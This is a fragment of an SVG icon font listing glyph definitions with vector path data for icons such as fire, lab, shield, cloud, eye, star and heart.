<glyph unicode="&#xedf5;" glyph-name="fire" d="M321.008-64c-68.246 142.008-31.902 223.378 20.55 300.044 57.44 83.956 72.244 167.066 72.244 167.066s45.154-58.7 27.092-150.508c79.772 88.8 94.824 230.28 82.782 284.464 180.314-126.012 257.376-398.856 153.522-601.066 552.372 312.532 137.398 780.172 65.154 832.85 24.082-52.676 28.648-141.85-20-185.126-82.352 312.276-285.972 376.276-285.972 376.276 24.082-161.044-87.296-337.144-194.696-468.73-3.774 64.216-7.782 108.528-41.55 169.98-7.58-116.656-96.732-211.748-120.874-328.628-32.702-158.286 24.496-274.18 241.748-396.622z" />
<glyph unicode="&#xedf6;" glyph-name="lab" d="M956.29 155.518l-316.29 527.024v213.458h32c17.6 0 32 14.4 32 32s-14.4 32-32 32h-320c-17.6 0-32-14.4-32-32s14.4-32 32-32h32v-213.458l-316.288-527.024c-72.442-120.734-16.512-219.518 124.288-219.518h640c140.8 0 196.73 98.784 124.29 219.518zM241.038 320l206.962 344.938v231.062h128v-231.062l206.964-344.938h-541.926z" />
<glyph unicode="&#xedf7;" glyph-name="magnet" d="M896 960h-256l64-576c0-106.040-85.96-192-192-192s-192 85.96-192 192l64 576h-256l-64-576c0-247.424 200.576-448 448-448s448 200.576 448 448l-64 576zM777.874 118.126c-71.018-71.014-165.44-110.126-265.874-110.126s-194.856 39.112-265.872 110.126c-70.116 70.118-109.13 163.048-110.11 262.054l36.092 324.82h111.114l-35.224-317.010v-3.99c0-70.518 27.46-136.814 77.324-186.676 49.862-49.864 116.158-77.324 186.676-77.324s136.814 27.46 186.676 77.324c49.864 49.862 77.324 116.158 77.324 186.676v3.988l-0.44 3.962-34.782 313.050h111.114l36.090-324.818c-0.98-99.006-39.994-191.938-110.108-262.056z" />
<glyph unicode="&#xedf8;" glyph-name="bin" d="M128 640v-640c0-35.2 28.8-64 64-64h576c35.2 0 64 28.8 64 64v640h-704zM320 64h-64v448h64v-448zM448 64h-64v448h64v-448zM576 64h-64v448h64v-448zM704 64h-64v448h64v-448zM848 832h-208v80c0 26.4-21.6 48-48 48h-224c-26.4 0-48-21.6-48-48v-80h-208c-26.4 0-48-21.6-48-48v-80h832v80c0 26.4-21.6 48-48 48zM576 832h-192v63.198h192v-63.198z" />
<glyph unicode="&#xedf9;" glyph-name="bin2" d="M192-64h640l64 704h-768zM640 832v128h-256v-128h-320v-192l64 64h768l64-64v192h-320zM576 832h-128v64h128v-64z" />
<glyph unicode="&#xedfa;" glyph-name="briefcase" d="M960 704h-256v64c0 35.2-28.8 64-64 64h-256c-35.204 0-64-28.8-64-64v-64h-256c-35.2 0-64-28.8-64-64v-576c0-35.202 28.796-64 64-64h896c35.2 0 64 28.798 64 64v576c0 35.2-28.8 64-64 64zM384 767.884c0.034 0.040 0.074 0.082 0.114 0.116h255.772c0.042-0.034 0.082-0.076 0.118-0.116v-63.884h-256.004v63.884zM960 448h-128v-96c0-17.602-14.4-32-32-32h-64c-17.604 0-32 14.398-32 32v96h-384v-96c0-17.602-14.4-32-32-32h-64c-17.602 0-32 14.398-32 32v96h-128v64h896v-64z" />
<glyph unicode="&#xedfb;" glyph-name="airplane" d="M768 320.032l-182.82 182.822 438.82 329.15-128.010 127.996-548.52-219.442-172.7 172.706c-49.78 49.778-119.302 61.706-154.502 26.508-35.198-35.198-23.268-104.726 26.51-154.5l172.686-172.684-219.464-548.582 127.99-128.006 329.19 438.868 182.826-182.828v-255.98h127.994l63.992 191.988 191.988 63.996v127.992l-255.98-0.004z" />
<glyph unicode="&#xedfc;" glyph-name="truck" d="M1024 384l-128 256h-192v128c0 35.2-28.8 64-64 64h-576c-35.2 0-64-28.8-64-64v-512l64-64h81.166c-10.898-18.832-17.166-40.678-17.166-64 0-70.692 57.308-128 128-128s128 57.308 128 128c0 23.322-6.268 45.168-17.166 64h354.334c-10.898-18.832-17.168-40.678-17.168-64 0-70.692 57.308-128 128-128s128 57.308 128 128c0 23.322-6.27 45.168-17.168 64h81.168v192zM704 384v192h132.668l96-192h-228.668z" />
<glyph unicode="&#xedfd;" glyph-name="road" d="M704-64h320l-256 1024h-192l32-256h-192l32 256h-192l-256-1024h320l32 256h320l32-256zM368 320l32 256h224l32-256h-288z" />
<glyph unicode="&#xedfe;" glyph-name="accessibility" d="M416 864c0 53.018 42.98 96 96 96s96-42.982 96-96c0-53.020-42.98-96-96-96s-96 42.98-96 96zM640 640l329.596 142.172-23.77 59.424-401.826-137.596h-64l-401.826 137.596-23.77-59.424 329.596-142.172v-256l-131.27-424.57 59.84-22.7 185.716 415.27h27.428l185.716-415.27 59.84 22.7-131.27 424.57z" />
<glyph unicode="&#xedff;" glyph-name="target" d="M1024 512h-100.924c-27.64 178.24-168.836 319.436-347.076 347.076v100.924h-128v-100.924c-178.24-27.64-319.436-168.836-347.076-347.076h-100.924v-128h100.924c27.64-178.24 168.836-319.436 347.076-347.076v-100.924h128v100.924c178.24 27.64 319.436 168.836 347.076 347.076h100.924v128zM792.822 512h-99.762c-19.284 54.55-62.51 97.778-117.060 117.060v99.762c107.514-24.49 192.332-109.31 216.822-216.822zM512 384c-35.346 0-64 28.654-64 64s28.654 64 64 64c35.346 0 64-28.654 64-64s-28.654-64-64-64zM448 728.822v-99.762c-54.55-19.282-97.778-62.51-117.060-117.060h-99.762c24.49 107.512 109.31 192.332 216.822 216.822zM231.178 384h99.762c19.282-54.55 62.51-97.778 117.060-117.060v-99.762c-107.512 24.49-192.332 109.308-216.822 216.822zM576 167.178v99.762c54.55 19.284 97.778 62.51 117.060 117.060h99.762c-24.49-107.514-109.308-192.332-216.822-216.822z" />
<glyph unicode="&#xee00;" glyph-name="shield" d="M960 960l-448-128-448 128c0 0-4.5-51.698 0-128l448-140.090 448 140.090c4.498 76.302 0 128 0 128zM72.19 764.894c23.986-250.696 113.49-672.234 439.81-828.894 326.32 156.66 415.824 578.198 439.81 828.894l-439.81-165.358-439.81 165.358z" />
<glyph unicode="&#xee01;" glyph-name="power" d="M384 960l-384-512h384l-256-512 896 640h-512l384 384z" />
<glyph unicode="&#xee02;" glyph-name="switch" d="M640 813.412v-135.958c36.206-15.804 69.5-38.408 98.274-67.18 60.442-60.44 93.726-140.8 93.726-226.274s-33.286-165.834-93.726-226.274c-60.44-60.44-140.798-93.726-226.274-93.726s-165.834 33.286-226.274 93.726c-60.44 60.44-93.726 140.8-93.726 226.274s33.286 165.834 93.726 226.274c28.774 28.774 62.068 51.378 98.274 67.182v135.956c-185.048-55.080-320-226.472-320-429.412 0-247.424 200.578-448 448-448 247.424 0 448 200.576 448 448 0 202.94-134.95 374.332-320 429.412zM448 960h128v-512h-128z" />
<glyph unicode="&#xee03;" glyph-name="power-cord" d="M1024 677.5l-90.506 90.5-178.746-178.752-101.5 101.502 178.75 178.75-90.5 90.5-178.75-178.75-114.748 114.75-86.626-86.624 512.002-512 86.624 86.622-114.752 114.752 178.752 178.75zM794.040 286.21l-443.824 443.824c-95.818-114.904-204.52-292.454-129.396-445.216l-132.248-132.248c-31.112-31.114-31.112-82.024 0-113.136l14.858-14.858c31.114-31.114 82.026-31.114 113.138 0l132.246 132.244c152.764-75.132 330.318 33.566 445.226 129.39z" />
<glyph unicode="&#xee04;" glyph-name="clipboard" d="M928 832h-288c0 70.692-57.306 128-128 128-70.692 0-128-57.308-128-128h-288c-17.672 0-32-14.328-32-32v-832c0-17.674 14.328-32 32-32h832c17.674 0 32 14.326 32 32v832c0 17.672-14.326 32-32 32zM512 896c35.346 0 64-28.654 64-64s-28.654-64-64-64c-35.346 0-64 28.654-64 64s28.654 64 64 64zM896 0h-768v768h128v-96c0-17.672 14.328-32 32-32h448c17.674 0 32 14.328 32 32v96h128v-768zM448 101.49l-205.254 237.254 58.508 58.51 146.746-114.744 274.742 242.744 58.514-58.508z" />
<glyph unicode="&#xee05;" glyph-name="list-numbered" d="M384 128h640v-128h-640zM384 512h640v-128h-640zM384 896h640v-128h-640zM192 960v-256h-64v192h-64v64zM128 434v-50h128v-64h-192v146l128 60v50h-128v64h192v-146zM256 256v-320h-192v64h128v64h-128v64h128v64h-128v64z" />
<glyph unicode="&#xee06;" glyph-name="list" d="M0 960h256v-256h-256zM384 896h640v-128h-640zM0 576h256v-256h-256zM384 512h640v-128h-640zM0 192h256v-256h-256zM384 128h640v-128h-640z" />
<glyph unicode="&#xee07;" glyph-name="list2" d="M384 896h640v-128h-640v128zM384 512h640v-128h-640v128zM384 128h640v-128h-640v128zM0 832c0 70.692 57.308 128 128 128s128-57.308 128-128c0-70.692-57.308-128-128-128s-128 57.308-128 128zM0 448c0 70.692 57.308 128 128 128s128-57.308 128-128c0-70.692-57.308-128-128-128s-128 57.308-128 128zM0 64c0 70.692 57.308 128 128 128s128-57.308 128-128c0-70.692-57.308-128-128-128s-128 57.308-128 128z" />
<glyph unicode="&#xee08;" glyph-name="tree" d="M976 192h-16v208c0 61.756-50.242 112-112 112h-272v128h16c26.4 0 48 21.6 48 48v160c0 26.4-21.6 48-48 48h-160c-26.4 0-48-21.6-48-48v-160c0-26.4 21.6-48 48-48h16v-128h-272c-61.756 0-112-50.244-112-112v-208h-16c-26.4 0-48-21.6-48-48v-160c0-26.4 21.6-48 48-48h160c26.4 0 48 21.6 48 48v160c0 26.4-21.6 48-48 48h-16v192h256v-192h-16c-26.4 0-48-21.6-48-48v-160c0-26.4 21.6-48 48-48h160c26.4 0 48 21.6 48 48v160c0 26.4-21.6 48-48 48h-16v192h256v-192h-16c-26.4 0-48-21.6-48-48v-160c0-26.4 21.6-48 48-48h160c26.4 0 48 21.6 48 48v160c0 26.4-21.6 48-48 48zM192 0h-128v128h128v-128zM576 0h-128v128h128v-128zM448 704v128h128v-128h-128zM960 0h-128v128h128v-128z" />
<glyph unicode="&#xee09;" glyph-name="menu" d="M64 768h896v-192h-896zM64 512h896v-192h-896zM64 256h896v-192h-896z" />
<glyph unicode="&#xee0a;" glyph-name="menu2" horiz-adv-x="1408" d="M0 768h896v-192h-896v192zM0 512h896v-192h-896v192zM0 256h896v-192h-896v192zM992 384l192-192 192 192zM1376 448l-192 192-192-192z" />
<glyph unicode="&#xee0b;" glyph-name="menu3" horiz-adv-x="1408" d="M0 768h896v-192h-896v192zM0 512h896v-192h-896v192zM0 256h896v-192h-896v192zM992 512l192-192 192 192z" />
<glyph unicode="&#xee0c;" glyph-name="menu4" horiz-adv-x="1408" d="M0 768h896v-192h-896v192zM0 512h896v-192h-896v192zM0 256h896v-192h-896v192zM992 320l192 192 192-192z" />
<glyph unicode="&#xee0d;" glyph-name="cloud" d="M1024 302.458c0 82.090-56.678 150.9-132.996 169.48-3.242 128.7-108.458 232.062-237.862 232.062-75.792 0-143.266-35.494-186.854-90.732-24.442 31.598-62.69 51.96-105.708 51.96-73.81 0-133.642-59.874-133.642-133.722 0-6.436 0.48-12.76 1.364-18.954-11.222 2.024-22.766 3.138-34.57 3.138-106.998 0.002-193.732-86.786-193.732-193.842 0-107.062 86.734-193.848 193.73-193.848l656.262 0.012c96.138 0.184 174.008 78.212 174.008 174.446z" />
<glyph unicode="&#xee0e;" glyph-name="cloud-download" d="M891.004 599.94c-3.242 128.698-108.458 232.060-237.862 232.060-75.792 0-143.266-35.494-186.854-90.732-24.442 31.598-62.69 51.96-105.708 51.96-73.81 0-133.642-59.876-133.642-133.722 0-6.436 0.48-12.76 1.364-18.954-11.222 2.024-22.766 3.138-34.57 3.138-106.998 0.002-193.732-86.786-193.732-193.842 0-107.062 86.734-193.848 193.73-193.848h91.76l226.51-234.51 226.51 234.51 111.482 0.012c96.138 0.184 174.008 78.21 174.008 174.446 0 82.090-56.678 150.9-132.996 169.482zM512 128l-192 192h128v192h128v-192h128l-192-192z" />
<glyph unicode="&#xee0f;" glyph-name="cloud-upload" d="M892.268 573.51c2.444 11.11 3.732 22.648 3.732 34.49 0 88.366-71.634 160-160 160-14.222 0-28.014-1.868-41.132-5.352-24.798 77.352-97.29 133.352-182.868 133.352-87.348 0-161.054-58.336-184.326-138.17-22.742 6.622-46.792 10.17-71.674 10.17-141.384 0-256-114.616-256-256 0-141.388 114.616-256 256-256h128v-192h256v192h224c88.366 0 160 71.632 160 160 0 78.72-56.854 144.162-131.732 157.51zM576 320v-192h-128v192h-160l224 224 224-224h-160z" />
<glyph unicode="&#xee10;" glyph-name="cloud-check" d="M892.268 445.51c2.442 11.108 3.732 22.646 3.732 34.49 0 88.366-71.634 160-160 160-14.224 0-28.014-1.868-41.134-5.352-24.796 77.352-97.288 133.352-182.866 133.352-87.348 0-161.054-58.336-184.326-138.17-22.742 6.62-46.792 10.17-71.674 10.17-141.384 0-256-114.616-256-256 0-141.382 114.616-256 256-256h608c88.366 0 160 71.632 160 160 0 78.718-56.854 144.16-131.732 157.51zM416 192l-160 160 64 64 96-96 224 224 64-64-288-288z" />
<glyph unicode="&#xee11;" glyph-name="download2" d="M896 448h-160l-224-224-224 224h-160l-128-256v-64h1024v64l-128 256zM0 64h1024v-64h-1024v64zM576 640v256h-128v-256h-224l288-288 288 288h-224z" />
<glyph unicode="&#xee12;" glyph-name="upload2" d="M0 64h1024v-64h-1024zM1024 192v-64h-1024v64l128 256h256v-128h256v128h256zM224 640l288 288 288-288h-224v-256h-128v256z" />
<glyph unicode="&#xee13;" glyph-name="download3" d="M736 512l-256-256-256 256h160v384h192v-384zM480 256h-480v-256h960v256h-480zM896 128h-128v64h128v-64z" />
<glyph unicode="&#xee14;" glyph-name="upload3" d="M480 256h-480v-256h960v256h-480zM896 128h-128v64h128v-64zM224 640l256 256 256-256h-160v-320h-192v320z" />
<glyph unicode="&#xee15;" glyph-name="sphere" d="M480 896c-265.096 0-480-214.904-480-480 0-265.098 214.904-480 480-480 265.098 0 480 214.902 480 480 0 265.096-214.902 480-480 480zM751.59 256c8.58 40.454 13.996 83.392 15.758 128h127.446c-3.336-44.196-13.624-87.114-30.68-128h-112.524zM208.41 576c-8.58-40.454-13.996-83.392-15.758-128h-127.444c3.336 44.194 13.622 87.114 30.678 128h112.524zM686.036 576c9.614-40.962 15.398-83.854 17.28-128h-191.316v128h174.036zM512 640v187.338c14.59-4.246 29.044-11.37 43.228-21.37 26.582-18.74 52.012-47.608 73.54-83.486 14.882-24.802 27.752-52.416 38.496-82.484h-155.264zM331.232 722.484c21.528 35.878 46.956 64.748 73.54 83.486 14.182 10 28.638 17.124 43.228 21.37v-187.34h-155.264c10.746 30.066 23.616 57.68 38.496 82.484zM448 576v-128h-191.314c1.88 44.146 7.666 87.038 17.278 128h174.036zM95.888 256c-17.056 40.886-27.342 83.804-30.678 128h127.444c1.762-44.608 7.178-87.546 15.758-128h-112.524zM256.686 384h191.314v-128h-174.036c-9.612 40.96-15.398 83.854-17.278 128zM448 192v-187.34c-14.588 4.246-29.044 11.372-43.228 21.37-26.584 18.74-52.014 47.61-73.54 83.486-14.882 24.804-27.75 52.418-38.498 82.484h155.266zM628.768 109.516c-21.528-35.876-46.958-64.746-73.54-83.486-14.184-9.998-28.638-17.124-43.228-21.37v187.34h155.266c-10.746-30.066-23.616-57.68-38.498-82.484zM512 256v128h191.314c-1.88-44.146-7.666-87.040-17.28-128h-174.034zM767.348 448c-1.762 44.608-7.178 87.546-15.758 128h112.524c17.056-40.886 27.344-83.806 30.68-128h-127.446zM830.658 640h-95.9c-18.638 58.762-44.376 110.294-75.316 151.428 42.536-20.34 81.058-47.616 114.714-81.272 21.48-21.478 40.362-44.938 56.502-70.156zM185.844 710.156c33.658 33.658 72.18 60.932 114.714 81.272-30.942-41.134-56.676-92.666-75.316-151.428h-95.898c16.138 25.218 35.022 48.678 56.5 70.156zM129.344 192h95.898c18.64-58.762 44.376-110.294 75.318-151.43-42.536 20.34-81.058 47.616-114.714 81.274-21.48 21.478-40.364 44.938-56.502 70.156zM774.156 121.844c-33.656-33.658-72.18-60.934-114.714-81.274 30.942 41.134 56.678 92.668 75.316 151.43h95.9c-16.14-25.218-35.022-48.678-56.502-70.156z" />
<glyph unicode="&#xee16;" glyph-name="earth" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512-0.002c-62.958 0-122.872 13.012-177.23 36.452l233.148 262.29c5.206 5.858 8.082 13.422 8.082 21.26v96c0 17.674-14.326 32-32 32-112.99 0-232.204 117.462-233.374 118.626-6 6.002-14.14 9.374-22.626 9.374h-128c-17.672 0-32-14.328-32-32v-192c0-12.122 6.848-23.202 17.69-28.622l110.31-55.156v-187.886c-116.052 80.956-192 215.432-192 367.664 0 68.714 15.49 133.806 43.138 192h116.862c8.488 0 16.626 3.372 22.628 9.372l128 128c6 6.002 9.372 14.14 9.372 22.628v77.412c40.562 12.074 83.518 18.588 128 18.588 70.406 0 137.004-16.26 196.282-45.2-4.144-3.502-8.176-7.164-12.046-11.036-36.266-36.264-56.236-84.478-56.236-135.764s19.97-99.5 56.236-135.764c36.434-36.432 85.218-56.264 135.634-56.26 3.166 0 6.342 0.080 9.518 0.236 13.814-51.802 38.752-186.656-8.404-372.334-0.444-1.744-0.696-3.488-0.842-5.224-81.324-83.080-194.7-134.656-320.142-134.656z" />
<glyph unicode="&#xee17;" glyph-name="link" d="M440.236 324.234c-13.31 0-26.616 5.076-36.77 15.23-95.134 95.136-95.134 249.934 0 345.070l192 192c46.088 46.086 107.36 71.466 172.534 71.466s126.448-25.38 172.536-71.464c95.132-95.136 95.132-249.934 0-345.070l-87.766-87.766c-20.308-20.308-53.23-20.308-73.54 0-20.306 20.306-20.306 53.232 0 73.54l87.766 87.766c54.584 54.586 54.584 143.404 0 197.99-26.442 26.442-61.6 41.004-98.996 41.004s-72.552-14.562-98.996-41.006l-192-191.998c-54.586-54.586-54.586-143.406 0-197.992 20.308-20.306 20.306-53.232 0-73.54-10.15-10.152-23.462-15.23-36.768-15.23zM256-52c-65.176 0-126.45 25.38-172.534 71.464-95.134 95.136-95.134 249.934 0 345.070l87.764 87.764c20.308 20.306 53.234 20.306 73.54 0 20.308-20.306 20.308-53.232 0-73.54l-87.764-87.764c-54.586-54.586-54.586-143.406 0-197.992 26.44-26.44 61.598-41.002 98.994-41.002s72.552 14.562 98.998 41.006l192 191.998c54.584 54.586 54.584 143.406 0 197.992-20.308 20.308-20.306 53.232 0 73.54 20.306 20.306 53.232 20.306 73.54-0.002 95.132-95.134 95.132-249.932 0.002-345.068l-192.002-192c-46.090-46.088-107.364-71.466-172.538-71.466z" />
<glyph unicode="&#xee18;" glyph-name="flag" d="M0 960h128v-1024h-128v1024zM832 316.998c82.624 0 154.57 19.984 192 49.5v512c-37.43-29.518-109.376-49.502-192-49.502s-154.57 19.984-192 49.502v-512c37.43-29.516 109.376-49.5 192-49.5zM608 927.472c-46.906 19.94-115.52 32.528-192 32.528-96.396 0-180.334-19.984-224-49.502v-512c43.666 29.518 127.604 49.502 224 49.502 76.48 0 145.094-12.588 192-32.528v512z" />
<glyph unicode="&#xee19;" glyph-name="attachment" d="M665.832 632.952l-64.952 64.922-324.81-324.742c-53.814-53.792-53.814-141.048 0-194.844 53.804-53.792 141.060-53.792 194.874 0l389.772 389.708c89.714 89.662 89.714 235.062 0 324.726-89.666 89.704-235.112 89.704-324.782 0l-409.23-409.178c-0.29-0.304-0.612-0.576-0.876-0.846-125.102-125.096-125.102-327.856 0-452.906 125.054-125.056 327.868-125.056 452.988 0 0.274 0.274 0.516 0.568 0.82 0.876l0.032-0.034 279.332 279.292-64.986 64.92-279.33-279.262c-0.296-0.268-0.564-0.57-0.846-0.844-89.074-89.058-233.98-89.058-323.076 0-89.062 89.042-89.062 233.922 0 322.978 0.304 0.304 0.604 0.582 0.888 0.846l-0.046 0.060 409.28 409.166c53.712 53.738 141.144 53.738 194.886 0 53.712-53.734 53.712-141.148 0-194.84l-389.772-389.7c-17.936-17.922-47.054-17.922-64.972 0-17.894 17.886-17.894 47.032 0 64.92l324.806 324.782z" />
<glyph unicode="&#xee1a;" glyph-name="eye" d="M512 768c-223.318 0-416.882-130.042-512-320 95.118-189.958 288.682-320 512-320 223.312 0 416.876 130.042 512 320-95.116 189.958-288.688 320-512 320zM764.45 598.296c60.162-38.374 111.142-89.774 149.434-150.296-38.292-60.522-89.274-111.922-149.436-150.296-75.594-48.218-162.89-73.704-252.448-73.704-89.56 0-176.858 25.486-252.452 73.704-60.158 38.372-111.138 89.772-149.432 150.296 38.292 60.524 89.274 111.924 149.434 150.296 3.918 2.5 7.876 4.922 11.86 7.3-9.96-27.328-15.41-56.822-15.41-87.596 0-141.382 114.616-256 256-256 141.382 0 256 114.618 256 256 0 30.774-5.452 60.268-15.408 87.598 3.978-2.378 7.938-4.802 11.858-7.302v0zM512 544c0-53.020-42.98-96-96-96s-96 42.98-96 96 42.98 96 96 96 96-42.982 96-96z" />
<glyph unicode="&#xee1b;" glyph-name="eye-plus" d="M1024 832h-128v128h-128v-128h-128v-128h128v-128h128v128h128zM863.862 513.972c18.436-20.478 35.192-42.53 50.022-65.972-38.292-60.522-89.274-111.922-149.436-150.296-75.594-48.218-162.89-73.704-252.448-73.704-89.56 0-176.86 25.486-252.454 73.704-60.156 38.372-111.136 89.772-149.43 150.296 38.292 60.524 89.274 111.924 149.434 150.296 3.918 2.5 7.876 4.922 11.862 7.3-9.962-27.328-15.412-56.822-15.412-87.596 0-141.382 114.616-256 256-256 141.38 0 256 114.618 256 256 0 0.692-0.018 1.38-0.024 2.072-109.284 28.138-190.298 126.63-191.932 244.31-21.026 2.38-42.394 3.618-64.044 3.618-223.318 0-416.882-130.042-512-320 95.118-189.958 288.682-320 512-320 223.31 0 416.876 130.042 512 320-17.64 35.23-38.676 68.394-62.65 99.054-29.28-17.178-62.272-28.71-97.488-33.082zM416 640c53.020 0 96-42.982 96-96 0-53.020-42.98-96-96-96s-96 42.98-96 96 42.98 96 96 96z" />
<glyph unicode="&#xee1c;" glyph-name="eye-minus" d="M640 832h384v-128h-384v128zM870.32 640h-294.32v124.388c-21.014 2.376-42.364 3.612-64 3.612-223.318 0-416.882-130.042-512-320 95.118-189.958 288.682-320 512-320 223.31 0 416.876 130.042 512 320-37.396 74.686-90.020 140.1-153.68 192zM416 640c53.020 0 96-42.982 96-96 0-53.020-42.98-96-96-96s-96 42.98-96 96 42.98 96 96 96zM764.448 297.704c-75.594-48.218-162.89-73.704-252.448-73.704-89.56 0-176.86 25.486-252.454 73.704-60.156 38.372-111.136 89.772-149.43 150.296 38.292 60.524 89.274 111.924 149.434 150.296 3.918 2.5 7.876 4.922 11.862 7.3-9.962-27.328-15.412-56.822-15.412-87.596 0-141.382 114.616-256 256-256 141.38 0 256 114.618 256 256 0 30.774-5.454 60.268-15.408 87.598 3.976-2.378 7.938-4.802 11.858-7.302 60.162-38.374 111.142-89.774 149.434-150.296-38.292-60.522-89.274-111.922-149.436-150.296z" />
<glyph unicode="&#xee1d;" glyph-name="eye-blocked" d="M945.942 945.942c-18.746 18.744-49.136 18.744-67.882 0l-202.164-202.164c-51.938 15.754-106.948 24.222-163.896 24.222-223.318 0-416.882-130.042-512-320 41.122-82.124 100.648-153.040 173.022-207.096l-158.962-158.962c-18.746-18.746-18.746-49.136 0-67.882 9.372-9.374 21.656-14.060 33.94-14.060s24.568 4.686 33.942 14.058l864 864c18.744 18.746 18.744 49.138 0 67.884zM416 640c42.24 0 78.082-27.294 90.92-65.196l-121.724-121.724c-37.902 12.838-65.196 48.68-65.196 90.92 0 53.020 42.98 96 96 96zM110.116 448c38.292 60.524 89.274 111.924 149.434 150.296 3.918 2.5 7.876 4.922 11.862 7.3-9.962-27.328-15.412-56.822-15.412-87.596 0-54.89 17.286-105.738 46.7-147.418l-60.924-60.924c-52.446 36.842-97.202 83.882-131.66 138.342zM768 518c0 27.166-4.256 53.334-12.102 77.898l-321.808-321.808c24.568-7.842 50.742-12.090 77.91-12.090 141.382 0 256 114.618 256 256zM830.026 670.026l-69.362-69.362c1.264-0.786 2.53-1.568 3.786-2.368 60.162-38.374 111.142-89.774 149.434-150.296-38.292-60.522-89.274-111.922-149.436-150.296-75.594-48.218-162.89-73.704-252.448-73.704-38.664 0-76.902 4.76-113.962 14.040l-76.894-76.894c59.718-21.462 123.95-33.146 190.856-33.146 223.31 0 416.876 130.042 512 320-45.022 89.916-112.118 166.396-193.974 222.026z" />
<glyph unicode="&#xee1e;" glyph-name="bookmark" d="M192 960v-1024l320 320 320-320v1024z" />
<glyph unicode="&#xee1f;" glyph-name="bookmarks" d="M256 832v-896l320 320 320-320v896zM768 960h-640v-896l64 64v768h576z" />
<glyph unicode="&#xee20;" glyph-name="sun" d="M512 128c35.346 0 64-28.654 64-64v-64c0-35.346-28.654-64-64-64s-64 28.654-64 64v64c0 35.346 28.654 64 64 64zM512 768c-35.346 0-64 28.654-64 64v64c0 35.346 28.654 64 64 64s64-28.654 64-64v-64c0-35.346-28.654-64-64-64zM960 512c35.346 0 64-28.654 64-64s-28.654-64-64-64h-64c-35.348 0-64 28.654-64 64s28.652 64 64 64h64zM192 448c0-35.346-28.654-64-64-64h-64c-35.346 0-64 28.654-64 64s28.654 64 64 64h64c35.346 0 64-28.654 64-64zM828.784 221.726l45.256-45.258c24.992-24.99 24.992-65.516 0-90.508-24.994-24.992-65.518-24.992-90.51 0l-45.256 45.256c-24.992 24.99-24.992 65.516 0 90.51 24.994 24.992 65.518 24.992 90.51 0zM195.216 674.274l-45.256 45.256c-24.994 24.994-24.994 65.516 0 90.51s65.516 24.994 90.51 0l45.256-45.256c24.994-24.994 24.994-65.516 0-90.51s-65.516-24.994-90.51 0zM828.784 674.274c-24.992-24.992-65.516-24.992-90.51 0-24.992 24.994-24.992 65.516 0 90.51l45.256 45.254c24.992 24.994 65.516 24.994 90.51 0 24.992-24.994 24.992-65.516 0-90.51l-45.256-45.254zM195.216 221.726c24.992 24.992 65.518 24.992 90.508 0 24.994-24.994 24.994-65.52 0-90.51l-45.254-45.256c-24.994-24.992-65.516-24.992-90.51 0s-24.994 65.518 0 90.508l45.256 45.258zM512 704c-141.384 0-256-114.616-256-256 0-141.382 114.616-256 256-256 141.382 0 256 114.618 256 256 0 141.384-114.616 256-256 256zM512 288c-88.366 0-160 71.634-160 160s71.634 160 160 160 160-71.634 160-160-71.634-160-160-160z" />
<glyph unicode="&#xee21;" glyph-name="contrast" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM128 448c0 212.078 171.922 384 384 384v-768c-212.078 0-384 171.922-384 384z" />
<glyph unicode="&#xee22;" glyph-name="brightness-contrast" d="M512 704c-141.384 0-256-114.616-256-256s114.616-256 256-256 256 114.616 256 256-114.616 256-256 256zM512 288v320c88.224 0 160-71.776 160-160s-71.776-160-160-160zM512 128c35.346 0 64-28.654 64-64v-64c0-35.346-28.654-64-64-64s-64 28.654-64 64v64c0 35.346 28.654 64 64 64zM512 768c-35.346 0-64 28.654-64 64v64c0 35.346 28.654 64 64 64s64-28.654 64-64v-64c0-35.346-28.654-64-64-64zM960 512c35.346 0 64-28.654 64-64s-28.654-64-64-64h-64c-35.346 0-64 28.654-64 64s28.654 64 64 64h64zM192 448c0-35.346-28.654-64-64-64h-64c-35.346 0-64 28.654-64 64s28.654 64 64 64h64c35.346 0 64-28.654 64-64zM828.784 221.726l45.256-45.256c24.992-24.992 24.992-65.516 0-90.51-24.994-24.992-65.518-24.992-90.51 0l-45.256 45.256c-24.992 24.992-24.992 65.516 0 90.51 24.994 24.992 65.518 24.992 90.51 0zM195.216 674.274l-45.256 45.256c-24.994 24.994-24.994 65.516 0 90.51s65.516 24.994 90.51 0l45.256-45.256c24.994-24.994 24.994-65.516 0-90.51s-65.516-24.994-90.51 0zM828.784 674.274c-24.992-24.992-65.516-24.992-90.51 0-24.992 24.994-24.992 65.516 0 90.51l45.256 45.254c24.992 24.994 65.516 24.994 90.51 0 24.992-24.994 24.992-65.516 0-90.51l-45.256-45.254zM195.216 221.726c24.992 24.992 65.516 24.992 90.508 0 24.994-24.994 24.994-65.518 0-90.51l-45.254-45.256c-24.994-24.992-65.516-24.992-90.51 0-24.994 24.994-24.994 65.518 0 90.51l45.256 45.256z" />
<glyph unicode="&#xee23;" glyph-name="star-empty" d="M1024 562.95l-353.78 51.408-158.22 320.582-158.216-320.582-353.784-51.408 256-249.538-60.432-352.352 316.432 166.358 316.432-166.358-60.434 352.352 256.002 249.538zM512 206.502l-223.462-117.48 42.676 248.83-180.786 176.222 249.84 36.304 111.732 226.396 111.736-226.396 249.836-36.304-180.788-176.222 42.678-248.83-223.462 117.48z" />
<glyph unicode="&#xee24;" glyph-name="star-half" d="M1024 562.95l-353.78 51.408-158.22 320.582-158.216-320.582-353.784-51.408 256-249.538-60.432-352.352 316.432 166.358 316.432-166.358-60.434 352.352 256.002 249.538zM512 206.502l-0.942-0.496 0.942 570.768 111.736-226.396 249.836-36.304-180.788-176.222 42.678-248.83-223.462 117.48z" />
<glyph unicode="&#xee25;" glyph-name="star-full" d="M1024 562.95l-353.78 51.408-158.22 320.582-158.216-320.582-353.784-51.408 256-249.538-60.432-352.352 316.432 166.358 316.432-166.358-60.434 352.352 256.002 249.538z" />
<glyph unicode="&#xee26;" glyph-name="heart" d="M755.188 896c-107.63 0-200.258-87.554-243.164-179-42.938 91.444-135.578 179-243.216 179-148.382 0-268.808-120.44-268.808-268.832 0-301.846 304.5-380.994 512.022-679.418 196.154 296.576 511.978 387.206 511.978 679.418 0 148.392-120.43 268.832-268.812 268.832z" />
